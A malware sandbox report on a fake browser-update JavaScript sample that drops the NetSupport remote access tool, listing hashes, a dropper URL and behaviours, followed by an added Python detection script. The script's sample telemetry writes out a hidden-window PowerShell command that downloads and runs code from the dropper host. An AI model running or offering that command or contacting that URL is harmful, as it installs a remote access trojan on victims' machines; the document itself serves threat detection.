General

  • Target

    Update - 114749.zip

  • Size

    5.3MB

  • Sample

    240611-ye2r4ayfnh

  • MD5

    6a92dd19374f69cc5ba125e4c14c09af

  • SHA1

    0cbf69ddea3ec5552dc664642e7e273073ec257b

  • SHA256

    4cf69758cb191de3edc2030019c3bb0c56346de4e85b6badcce9aba8a23706fa

  • SHA512

    f31a0d45b143f3d691e8da9652aee60d374afad61af567cd968c9d6263b26e7fa2bb26ce5f1162b8f426036f3c987eaa4f37e961b8c615a6b1831790ac209b7d

  • SSDEEP

    98304:5+jXXUiXX0GOe1HhX+IZB1+RjwGqas04lQ7OZj5NuEP9rzm3xMHIzX+C/:I7UfjMlfB1GqZ04laAj5PzyW2OC/

Malware Config

Extracted

  • Language

    ps1

  • Source: ps1.dropper

    URLs: http://psk777.casa/help.php?12698

  • Source: exe.dropper

    URLs: http://psk777.casa/help.php?12698

Targets

    • Target

      Update 124.0.6367.158.js

    • Size

      22.7MB

    • MD5

      fcfee72585f617db2f7e7c8dbb17ea87

    • SHA1

      6b2021195a6f6a90b137c67dcafec262c478b4bf

    • SHA256

      b12c6d411ff605497092f9d712f16a0e1948caeca5ca37587f22dce756a2f2b7

    • SHA512

      0cfc4f400ea2651b0fe11218e282b13b4d74eeb1419f25a3eda0da2002a644f0adf4eaf12631b462ddab3c471e9062afe7fbf15b361377d53c66de7d9bab9e4e

    • SSDEEP

      49152:paZYOjByI+BJ8V6tlBDBFvLBLtmpf+T2vPHr+Z3jb4WsjcqTbsPF5xhyMa81qId9:7

    • NetSupport

      NetSupport is a remote access tool sold as legitimate system administration software.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application
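
The behaviours listed above (hidden-window PowerShell, the network request to the dropper URL, the country-code registry lookup, and the Run key persistence) map directly onto host telemetry. The script below is an added example, not part of the sandbox report or the sample itself: it runs a small set of detection rules over constructed process, network and registry events. The dropper URL is the one the report lists; the command line, file paths and registry paths in the sample events are assumptions made for illustration, and the `Control Panel\International\Geo\Nation` value is the usual location of the configured country code, not something the report names.

```python
import re

# Constructed sample telemetry (NOT taken from the sandbox report).
# Format: event_type|image|details. The dropper URL is the one the report
# lists; the command line, paths and registry keys are assumed for illustration.
SAMPLE_EVENTS = [
    "process_create|wscript.exe|C:\\Users\\victim\\Downloads\\Update 124.0.6367.158.js",
    "process_create|powershell.exe|powershell.exe -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://psk777.casa/help.php?12698')\"",
    "network|powershell.exe|GET http://psk777.casa/help.php?12698",
    "registry_read|powershell.exe|HKCU\\Control Panel\\International\\Geo\\Nation",
    "process_create|dropped.exe|C:\\Users\\victim\\AppData\\Roaming\\Update\\dropped.exe",
    "registry_set|powershell.exe|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update",
    "process_create|explorer.exe|C:\\Windows\\explorer.exe",
]

# Indicator from the report: the host serving both the ps1 and exe droppers.
DROPPER_HOST = "psk777.casa"

# PowerShell accepts abbreviated parameter names, so match -w / -win / -WindowStyle.
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)
# Run and RunOnce keys under HKCU or HKLM (T1547.001).
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
# Assumed location of the configured country code (GeoID) used for geofencing.
GEO_KEY = re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.IGNORECASE)
# Script hosts that a .js lure would be opened with.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def detect(events):
    """Return (label, event) pairs for every event that matches a rule.

    Malformed events (not three pipe-separated fields) are skipped rather
    than raising, so one bad log line cannot abort the whole run.
    """
    hits = []
    for line in events:
        try:
            etype, image, details = line.split("|", 2)
        except ValueError:
            continue
        image = image.lower()
        if etype == "process_create" and image in SCRIPT_HOSTS \
                and details.lower().endswith(".js"):
            hits.append(("script host launching .js", line))
        if etype == "process_create" and image == "powershell.exe" \
                and HIDDEN_WINDOW.search(details):
            hits.append(("T1059.001 hidden-window PowerShell", line))
        if etype == "network" and DROPPER_HOST in details.lower():
            hits.append(("dropper URL contact", line))
        if etype == "registry_read" and GEO_KEY.search(details):
            hits.append(("geofence check (country code lookup)", line))
        if etype == "registry_set" and RUN_KEY.search(details):
            hits.append(("T1547.001 Run key persistence", line))
    return hits


if __name__ == "__main__":
    for label, event in detect(SAMPLE_EVENTS):
        print(f"[{label}] {event}")
```

Each rule is deliberately narrow to the behaviour the report describes; in production the hidden-window and Run key rules would fire on some benign administration scripts, so the dropper-host indicator is the one worth alerting on by itself, while the others are best used to raise the score of a single process chain.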

MITRE ATT&CK Enterprise v15
